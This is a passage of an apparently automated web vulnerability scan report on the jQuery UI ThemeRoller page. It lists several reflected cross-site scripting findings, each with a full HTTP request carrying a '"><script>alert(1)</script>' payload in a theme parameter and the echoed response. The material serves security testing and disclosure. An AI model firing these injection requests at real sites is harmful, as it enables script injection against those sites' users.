GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd0114d79"><script>alert(1)</script>6fce8723dd7&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd0114d79"><script>alert(1)</script>6fce8723dd7&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png
...[SNIP]...

1.118. http://jqueryui.com/themeroller/ [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3420"><script>alert(1)</script>b2a0d8950b9 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdda3420"><script>alert(1)</script>b2a0d8950b9&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdda3420"><script>alert(1)</script>b2a0d8950b9&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

1.119. http://jqueryui.com/themeroller/ [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5febe"><script>alert(1)</script>977976b6be5 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d55febe"><script>alert(1)</script>977976b6be5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d55febe"><script>alert(1)</script>977976b6be5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityAct
...[SNIP]...

1.120. http://jqueryui.com/themeroller/ [iconColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c777"><script>alert(1)</script>19a80c4851a was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a8c777"><script>alert(1)</script>19a80c4851a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a8c777"><script>alert(1)</script>19a80c4851a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.121. http://jqueryui.com/themeroller/ [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85187"><script>alert(1)</script>054e8a7d848 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f385187"><script>alert(1)</script>054e8a7d848&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f385187"><script>alert(1)</script>054e8a7d848&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&
...[SNIP]...

1.122. http://jqueryui.com/themeroller/ [iconColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b5a7"><script>alert(1)</script>e3691bf26a5 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff6b5a7"><script>alert(1)</script>e3691bf26a5&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ve=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff6b5a7"><script>alert(1)</script>e3691bf26a5&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

1.123. http://jqueryui.com/themeroller/ [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab976"><script>alert(1)</script>e10766f4522 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0ab976"><script>alert(1)</script>e10766f4522&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0ab976"><script>alert(1)</script>e10766f4522&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI
...[SNIP]...

1.124. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee58"><script>alert(1)</script>e852cc5eefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?1ee58"><script>alert(1)</script>e852cc5eefd=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:19:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&1ee58"><script>alert(1)</script>e852cc5eefd=1" type="text/css" media="all" />
...[SNIP]...

1.125. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25f"><script>alert(1)</script>4bda565ed47 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxbe25f"><script>alert(1)</script>4bda565ed47&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:27:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxbe25f"><script>alert(1)</script>4bda565ed47&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.126. http://jqueryui.com/themeroller/ [offsetTopShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4c6"><script>alert(1)</script>26630e994c5 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px8f4c6"><script>alert(1)</script>26630e994c5&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
